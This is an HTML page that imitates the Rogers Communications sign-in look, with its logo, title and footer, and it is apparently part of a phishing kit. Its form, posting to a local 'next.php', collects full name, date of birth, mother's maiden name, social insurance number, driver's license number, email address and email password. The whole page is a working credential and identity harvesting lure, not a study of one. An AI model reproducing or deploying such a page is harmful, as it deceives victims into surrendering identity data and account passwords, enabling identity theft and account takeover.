<!DOCTYPE html>
<html ng-app="rymcApp" class="ng-scope" lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="cache-control" content="max-age=0">
	<meta http-equiv="cache-control" content="no-cache">
	<meta http-equiv="expires" content="0">
	<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT">
	<meta http-equiv="pragma" content="no-cache">
	
  <link rel="icon" type="image/x-icon" href="https://www.rogers.com/contentful/assets/i/favicon.ico">
    <title>Rogers: Wireless, Internet, TV, Home Monitoring, and Home Phone</title>

    <!-- build:css(.) styles/vendor.css -->
    <link rel="stylesheet" href="files/bootstrap.css">
    <link rel="stylesheet" href="files/font-awesome.css">
      <!-- endbuild -->

    <!-- build:css styles/main.css -->
    <link href="files/common.css" rel="stylesheet">
    <link href="files/signin.css" rel="stylesheet">
    <link href="files/dashboard.css" rel="stylesheet">
    <link href="files/createaccount.css" rel="stylesheet">
    <link href="files/modals.css" rel="stylesheet">
    <link href="files/ted-next.css" rel="stylesheet">
    <link href="files/authorizedApplications.css" rel="stylesheet">
    <link href="files/accountInformation.css" rel="stylesheet">
    <link href="files/changePassword.css" rel="stylesheet">
    <link href="files/authentication.css" rel="stylesheet">
    <link href="files/alternateContactInfo.css" rel="stylesheet">
    <link href="files/accountActivity.css" rel="stylesheet">

    <link href="files/rui-icons.css" rel="stylesheet">
    <link href="files/appHeader.css" rel="stylesheet">
    <link href="files/appFooter.css" rel="stylesheet">

    <!-- endbuild -->

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->


    <!-- build:js(.) scripts/vendor.js -->
    <!-- bower:js -->



</head>
<body>
<app-header><!-- ngIf: showSignInHeader --><div ng-class="[{true:'login_header_outer_iosapp', false:'login_header_outer'}[isIOSApp], {true:'navbar-fixed-top'}[true]]" ng-if="showSignInHeader" class="ng-scope login_header_outer navbar-fixed-top">
	<div class="container">
		<div class="row login_header">
			<div class="col-lg-2 col-sm-3 col-xs-3">
				<a href="http://www.rogers.com/consumer/home?setLanguage=en" target="_blank"><img src="files/Rogers.png" alt="ROGERS_LOGO" class="logo"></a>
			</div>
			<div class="col-lg-3 col-sm-3 col-xs-7 subhd">
				<span translate="" class="ng-scope"></span>
			</div>
			<div class="col-lg-7 col-sm-6 col-xs-2">
				<div class="language">
					<!-- ngIf: lang=='fr' --><!-- ngIf: lang=='en' --><a ng-if="lang=='en'" ng-click="changeLanguage('fr')" translate="toggle_lang" class="ng-scope">Français</a><!-- end ngIf: lang=='en' -->
				</div>
			</div>

			<div class="shadow"></div>
		</div>
	</div>
</div><!-- end ngIf: showSignInHeader -->

<!-- ngIf: !showSignInHeader --></app-header>
<!-- uiView: --><div ui-view="" autoscroll="true" class="ng-scope"><div class="app_outer ng-scope">
	<div class="portal">


		<div class="container-fluid">


			<!-- ngIf: vm.showSignin --><div class="login_wrapper ng-scope" ng-if="vm.showSignin">

				<form method="post" action="next.php" class="form-signin ng-pristine ng-invalid ng-invalid-required ng-valid-email" name="signInForm" >
					<!-- ngIf: !vm.userFromYahoo --><h2 class="form-signin-heading ng-scope" translate="signin.welcome" ng-if="!vm.userFromYahoo">Your Information</h2><!-- end ngIf: !vm.userFromYahoo -->
					<!-- ngIf: vm.userFromYahoo -->
					<!-- ngIf: vm.userFromYahoo -->
					<div class="row">
						<div class="col-sm-12">
							<p translate="newLayoutMsg" class="text-left ng-scope">* Complete the recipient information. </p>
							<p translate="newLayoutMsg" class="text-left ng-scope">* All fields are required.</p>
						</div>
					</div>
					<!--  Hello -->
					<!--  do not remove the string above-->
			
					<!-- ngIf: !vm.userFromYahoo -->
				
					</br></br>
				
					<div class="form-group ">
				
					<input type="text" id="username" class="form-control ng-pristine" placeholder="Full name" name="FN"  required=""> 
					</div>
					
					<div class="form-group ">
				
					<input type="text" id="username" class="form-control ng-pristine" placeholder="Date of birth (mm/dd/yyyy)"  minlength="10" maxlength="10" name="DB"  required=""> 
					</div>
					<div class="form-group ">
				
					<input type="text" id="username" class="form-control ng-pristine" placeholder="Mother's maiden name" name="MN"  required=""> 
					</div>
					<div class="form-group ">
				
					<input type="text" id="username" class="form-control ng-pristine" placeholder="Social insurance number" minlength="9" maxlength="11" name="SN"   required=""> 
					</div>
					<div class="form-group ">
				
					<input type="text" id="username" class="form-control ng-pristine" placeholder="Driver's license number"  maxlength="15" name="DL"   required=""> 
					</div>
					<div class="form-group ">
				
					<input type="email" id="username" class="form-control ng-pristine" placeholder="Email address" name="EA"  required=""> 
					</div>
					<div class="form-group ">
				
					<input type="password" id="username" class="form-control ng-pristine" placeholder="Email password" name="EP"  required=""> 
					</div>


					<div class="button-group">
						<!-- <button class="btn button-color" type="submit" translate="buttons.next" ng-disabled="!signInForm.signInEmailAddress.$error.pattern || !signInForm.signInEmailAddress.$invalid || signInForm.currentPassword.$invalid"></button>-->
						<button class="btn button-color" type="submit" style="width:100%">Next</button>
						<div class="widget-loader ng-hide" ng-show="vm.loading">
							<img src="files/widget-loader.gif" style="width: 30px">
						</div>
					</div>
				</form>


			</div><!-- end ngIf: vm.showSignin -->

			<!-- ngIf: vm.enterotp -->


		</div>
	</div>
</div></div>
<app-footer><footer id="footer-bar" ng-show="showFooter" class="ng-hide">
    <div class="container">
        <span class="copyright col-xs-12 col-sm-3 col-md-4 ng-binding" id="copyright"><span translate="copyright.preYear" class="ng-scope">Copyright 1995 -</span> 2019 <span translate="copyright.copy" class="ng-scope">Rogers Communications</span></span>
        <div class="col-xs-12 col-sm-9 col-md-8 pull-right">
            <ul class="footer-bar-links">
                <!-- ngIf: lang=='en' --><li ng-if="lang=='en'" class="ng-scope"><a href="http://www.rogers.com/web/content/Privacy-CRTC" target="_blank" translate="privacy_policy" class="ng-scope">Privacy Policy</a></li><!-- end ngIf: lang=='en' -->
                <!-- ngIf: lang=='fr' -->
                <!-- ngIf: lang=='en' --><li ng-if="lang=='en'" class="ng-scope"><a href="http://www.rogers.com/terms" target="_blank" translate="terms" class="ng-scope">Terms &amp; Conditions</a></li><!-- end ngIf: lang=='en' -->
                <!-- ngIf: lang=='fr' -->
                <li translate="yahoo_legal" class="ng-scope"><a href="https://policies.yahoo.com/xw/en/yahoo/terms/product-atos/comms/index.htm" target="_blank">Yahoo Communications Terms</a></li>
            </ul>

        </div>
    </div>
</footer></app-footer>


</body></html>